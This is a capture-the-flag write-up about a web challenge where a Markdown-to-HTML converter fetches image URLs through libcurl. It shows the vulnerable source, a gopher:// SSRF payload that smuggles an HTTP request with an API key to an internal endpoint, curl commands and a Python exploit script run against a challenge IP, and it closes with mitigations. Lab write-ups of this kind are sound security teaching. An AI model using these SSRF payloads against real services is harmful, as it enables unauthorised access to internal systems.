Amazon AppSec CTF: PageOneHTML
Executive Summary
- Challenge: PageOneHTML
- Category: Web Security
- Vulnerability: Server-Side Request Forgery (SSRF) via gopher:// protocol
- Impact: Access to internal API endpoint leading to flag disclosure
- Flags:
  - Local: HTB{f4k3_fl4g_f0r_t3st1ng}
  - Remote: HTB{l1bcurL_pla7h0r4_0f_pr0tocOl5}
Source-to-Sink Analysis
1. Entry Point - User Input (Source)
The vulnerability starts at the /api/convert endpoint, which accepts user-controlled Markdown content:
// routes/index.js:15-28
router.post('/api/convert', async (req, res) => {
    const { markdown_content, port_images } = req.body; // User input
    if (markdown_content) {
        html = MDHelper.makeHtml(markdown_content); // Convert MD to HTML
        if (port_images) { // If port_images is true
            return ImageConverter.PortImages(html) // Process images
                .then(newHTML => res.json({ content: newHTML }))
                .catch(() => res.json({ content: html }));
        }
        return res.json({ content: html });
    }
    return res.status(403).send(response('Missing parameters!'));
});
2. Image Processing - Protocol Confusion
The ImageConverter helper extracts all <img> tags and processes their src attributes:
// helpers/ImageConverter.js:5-28
module.exports = {
    PortImages(html) {
        return new Promise(async (resolve, reject) => {
            try {
                const $ = cheerio.load(html);
                function downloader(el) {
                    imgSrc = $(el).attr('src'); // Extract src attribute
                    return Promise.resolve(ImageDownloader.downloadImage(imgSrc));
                }
                Promise.all(
                    $('img')
                        .map(async (i, el) => {
                            newSrc = await downloader(el); // Download and convert
                            $(el).attr('src', newSrc) // Replace with data URI
                        })
                        .get()
                ).then(() => {
                    return resolve($.html());
                })
            } catch (e) {
                console.log(e);
                reject(e);
            }
        });
    }
};
3. The Vulnerable Sink - libcurl Protocol Support
The critical vulnerability lies in ImageDownloader.js, which passes the URL to node-libcurl without protocol validation:
// helpers/ImageDownloader.js:29-49
module.exports = {
    async downloadImage(url) {
        return new Promise(async (resolve, reject) => {
            curly.get(url) // VULNERABILITY: Accepts any protocol supported by libcurl
                .then(resp => {
                    buffer = Buffer.from(resp.data,'utf8')
                    if (isPng(buffer))
                        dataUri = "data:image/png;base64,";
                    else if (isJpg(buffer))
                        dataUri = "data:image/jpg;base64,";
                    else
                        dataUri = "data:image/svg+xml;base64"; // Non-images treated as SVG
                    return resolve(`${dataUri} ${buffer.toString('base64')}`); // Leak response
                })
                .catch(e => {
                    console.log(e)
                    return resolve(url);
                })
        });
    }
};
Key vulnerabilities:
- curly.get(url) accepts any protocol supported by the underlying libcurl build (http, https, ftp, gopher, dict, file, etc.)
- Non-image responses are base64-encoded and returned, leaking their content
- No URL validation or protocol allowlisting
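To make the leak concrete, the following Python sketch mimics the wrapping logic of downloadImage and shows that the attacker can recover the fetched bytes unchanged. It is an illustration only: the names wrap_like_sink and recover_body are hypothetical, and the magic-byte comparisons are simplified stand-ins for the application's isPng and isJpg helpers.

```python
import base64

# Simplified stand-ins for the isPng / isJpg checks (assumption).
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPG_MAGIC = b"\xff\xd8\xff"


def wrap_like_sink(body: bytes) -> str:
    """Mimic downloadImage(): pick a data-URI prefix, then append base64."""
    if body.startswith(PNG_MAGIC):
        prefix = "data:image/png;base64,"
    elif body.startswith(JPG_MAGIC):
        prefix = "data:image/jpg;base64,"
    else:
        # Fallback branch from the source: anything else is labelled SVG.
        prefix = "data:image/svg+xml;base64"
    return f"{prefix} {base64.b64encode(body).decode('ascii')}"


def recover_body(data_uri: str) -> bytes:
    """Attacker side: everything after the first space is the base64 payload."""
    _, _, encoded = data_uri.partition(" ")
    return base64.b64decode(encoded)


# A non-image response, such as the reply from an internal HTTP endpoint.
internal_response = b"HTTP/1.1 200 OK\r\n\r\nHTB{f4k3_fl4g_f0r_t3st1ng}\n"
leaked = wrap_like_sink(internal_response)
print(recover_body(leaked) == internal_response)
```

Because the fallback branch never rejects non-image data, any response libcurl can fetch ends up in the JSON returned to the caller.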
4. The Target - Internal API Endpoint
The internal /api/dev endpoint is protected only by a source-IP check and a hardcoded API key:
// routes/index.js:30-38
router.get('/api/dev', async (req, res) => {
    // Only allow requests from localhost
    if (req.ip != '127.0.0.1') return res.status(403).send(response('Access denied!'));
    if (req.headers["x-api-key"] == "934caf984a4ca94817ea6d87d37af4b3") {
        return res.send(execSync('./flagreader.bin').toString()); // Flag!
    }
    return res.status(403).send(response('missing apikey!'));
});
Exploit Chain
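Exploit Flow Diagram
1. The attacker POSTs Markdown containing <img src="gopher://127.0.0.1:1337/_..."> to /api/convert with port_images set to true
2. MDHelper.makeHtml converts it to HTML, and ImageConverter.PortImages passes the src value to ImageDownloader.downloadImage
3. curly.get opens the gopher:// URL and writes the embedded HTTP request to 127.0.0.1:1337
4. /api/dev sees a loopback source address and the correct x-api-key, so it returns the flag
5. downloadImage wraps the response as a base64 data URI, which /api/convert returns to the attacker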
Payload Construction
Step 1: Craft the Raw HTTP Request
We need to send this HTTP request to the internal endpoint:
GET /api/dev HTTP/1.1
Host: 127.0.0.1
x-api-key: 934caf984a4ca94817ea6d87d37af4b3
Connection: close
Step 2: Convert to Gopher URL
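The gopher URL format is gopher://host:port/_<data>. The first character after the slash is the gopher item type, which libcurl drops; everything after it is percent-decoded and written to the socket as-is. To encode the request:
- URL-encode spaces as %20
- URL-encode CRLF as %0D%0A
- Prefix the data with _ (a placeholder for the item-type character)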
gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A
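The encoding steps can also be scripted rather than done by hand. The sketch below uses urllib.parse.quote from the Python standard library; the helper name build_gopher_url is hypothetical, and keeping "/" and ":" unencoded is a readability choice that matches the URL above rather than a protocol requirement.

```python
from urllib.parse import quote


def build_gopher_url(host: str, port: int, raw_request: str) -> str:
    """Wrap a raw TCP payload in a gopher:// URL.

    The "_" is a throwaway gopher item-type character; the percent-decoded
    remainder is what gets written to the socket.
    """
    # Keep "/" and ":" literal for readability; spaces and CRLF are encoded.
    encoded = quote(raw_request, safe="/:")
    return f"gopher://{host}:{port}/_{encoded}"


# The raw HTTP request from Step 1, with explicit CRLF line endings.
raw_request = (
    "GET /api/dev HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "x-api-key: 934caf984a4ca94817ea6d87d37af4b3\r\n"
    "Connection: close\r\n"
    "\r\n"
)

gopher_url = build_gopher_url("127.0.0.1", 1337, raw_request)
print(gopher_url)
```

The trailing empty line in raw_request matters: it produces the final %0D%0A%0D%0A that terminates the HTTP header block.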
Step 3: Embed in HTML Image Tag
<img src="gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A">
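Embedding this tag in a JSON request body by hand means escaping every double quote. A small sketch of letting the standard library do that instead is shown here; build_convert_body is a hypothetical helper, and the field names are the ones read by the /api/convert handler.

```python
import html
import json


def build_convert_body(image_url: str) -> str:
    """Return the JSON body for POST /api/convert with the URL in an <img> tag."""
    # html.escape(quote=True) keeps the attribute well-formed if the URL ever
    # contains quotes or ampersands; the gopher URL used here has neither.
    img_tag = f'<img src="{html.escape(image_url, quote=True)}">'
    return json.dumps({"markdown_content": img_tag, "port_images": True})


gopher_url = (
    "gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0A"
    "Host:%20127.0.0.1%0D%0A"
    "x-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0A"
    "Connection:%20close%0D%0A%0D%0A"
)
body = build_convert_body(gopher_url)
print(body)
```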
Exploitation
Local Testing (Docker Container)
- Send the exploit payload:
curl -s http://127.0.0.1:1337/api/convert \
-H 'Content-Type: application/json' \
--data-binary '{
"markdown_content": "<img src=\"gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A\">",
"port_images": true
}'
- Extract and decode the base64 response:
curl -s http://127.0.0.1:1337/api/convert \
-H 'Content-Type: application/json' \
--data-binary '{"markdown_content":"<img src=\"gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A\">","port_images":true}' \
| jq -r .content \
| sed -n 's/.*base64 \(.*\)".*/\1/p' \
| tr -d '\n' \
| base64 -d
Local Output:
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 27
Date: Thu, 11 Sep 2025 14:46:35 GMT
Connection: close

HTB{f4k3_fl4g_f0r_t3st1ng}
Remote Exploitation
Python exploit script:
import json
import re
import base64
import urllib.request
# Target URL
url = "http://94.237.53.82:31404/api/convert"
# Gopher SSRF payload
payload = {
    "markdown_content": '<img src="gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A">',
    "port_images": True
}
# Send request
req = urllib.request.Request(
    url,
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"}
)
# Get response
response = urllib.request.urlopen(req, timeout=15).read().decode()
obj = json.loads(response)
# Extract base64 from data URI
content = obj.get("content", "")
match = re.search(r"base64\s+([A-Za-z0-9+/=\n\r]+)", content)
if match:
    b64_data = match.group(1).replace("\n", "").replace("\r", "")
    decoded = base64.b64decode(b64_data).decode()
    print(decoded)
Remote Output:
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 35
Date: Thu, 11 Sep 2025 14:47:34 GMT
Connection: close

HTB{l1bcurL_pla7h0r4_0f_pr0tocOl5}
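The decoded output is a raw HTTP response, so the flag still has to be picked out of it. One possible way to automate that is sketched below; split_http_response and find_flag are hypothetical helper names, and the sample string reproduces the local response shown earlier, minus the Date header.

```python
import re
from typing import Dict, Optional, Tuple


def split_http_response(raw: str) -> Tuple[Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into a header dict and the body text."""
    head, _, body = raw.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def find_flag(text: str) -> Optional[str]:
    """Return the first HTB{...} token in text, or None if there is none."""
    match = re.search(r"HTB\{[^}]*\}", text)
    return match.group(0) if match else None


sample = (
    "HTTP/1.1 200 OK\r\n"
    "X-Powered-By: Express\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 27\r\n"
    "Connection: close\r\n"
    "\r\n"
    "HTB{f4k3_fl4g_f0r_t3st1ng}\n"
)
headers, body = split_http_response(sample)
print(headers["content-length"], find_flag(body))
```

Comparing the body length with the Content-Length header is a quick check that the base64 payload was extracted in full.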
Root Cause Analysis
Vulnerability Chain
Security Issues Identified
- Protocol Confusion - The URL is handed to node-libcurl without restricting which protocols it may use
- SSRF - No egress filtering or destination validation
- Response Leakage - Non-image content is base64-encoded and returned to the caller
- Weak Access Control - Internal endpoint trusts the loopback source address, which an SSRF from the same host satisfies
- Static Credentials - Hardcoded API key in source code
Mitigation Recommendations
1. Protocol Allowlisting
// Example fix for ImageDownloader.js
const ALLOWED_PROTOCOLS = ['http:', 'https:'];
async downloadImage(url) {
    const parsedUrl = new URL(url); // Throws on malformed URLs
    if (!ALLOWED_PROTOCOLS.includes(parsedUrl.protocol)) {
        throw new Error('Invalid protocol');
    }
    // ... rest of the code
}
2. SSRF Protection
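// Block internal networks (sketch; assumes Node.js 15+ for net.BlockList)
const net = require('net');
const dns = require('dns').promises;

const BLOCKED_IPS = [
    ['127.0.0.0', 8, 'ipv4'],    // Loopback
    ['10.0.0.0', 8, 'ipv4'],     // Private network
    ['172.16.0.0', 12, 'ipv4'],  // Private network
    ['192.168.0.0', 16, 'ipv4'], // Private network
    ['169.254.0.0', 16, 'ipv4'], // Link-local
    ['fc00::', 7, 'ipv6'],       // IPv6 unique local (includes fd00::/8)
    ['::1', 128, 'ipv6']         // IPv6 loopback
];
const blockList = new net.BlockList();
for (const [prefix, bits, family] of BLOCKED_IPS) {
    blockList.addSubnet(prefix, bits, family);
}

// Resolve the hostname and report whether any resolved address is internal.
// The request must then connect to the validated address, or DNS rebinding
// can bypass this check.
async function isInternalIP(hostname) {
    const addresses = await dns.lookup(hostname, { all: true });
    return addresses.some(({ address, family }) =>
        blockList.check(address, family === 6 ? 'ipv6' : 'ipv4'));
}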
3. Content Type Validation
// Strict image validation (sketch; assumes a global fetch and an isSvg helper)
async downloadImage(url) {
    const response = await fetch(url);
    const contentType = response.headers.get('content-type');
    if (!contentType?.startsWith('image/')) {
        throw new Error('Not an image');
    }
    // arrayBuffer() works with native fetch, which has no response.buffer()
    const buffer = Buffer.from(await response.arrayBuffer());
    if (!isPng(buffer) && !isJpg(buffer) && !isSvg(buffer)) {
        throw new Error('Invalid image format');
    }
    // ... process valid image
}
4. Remove Internal Debug Endpoints
- Remove the /api/dev endpoint in production
- Use proper authentication mechanisms (OAuth, JWT)
- Implement rate limiting and monitoring
Timeline
- Initial Analysis - Code review reveals SSRF vector via node-libcurl
- Protocol Testing - Confirmed gopher:// protocol support
- Payload Development - Crafted gopher URL with HTTP request
- Local Exploitation - Retrieved test flag from Docker environment
- Remote Exploitation - Successfully extracted production flag
Lessons Learned
- Never trust user input - All URLs should be validated
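- Principle of least privilege - Enable only the protocols the feature needs (here, http and https)
- Defense in depth - No single check (IP filter, API key, or image detection) should be the only barrier
- Secure defaults - Configure libraries explicitly instead of relying on permissive defaults such as libcurl's broad protocol support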
- Regular security audits - Third-party dependencies need review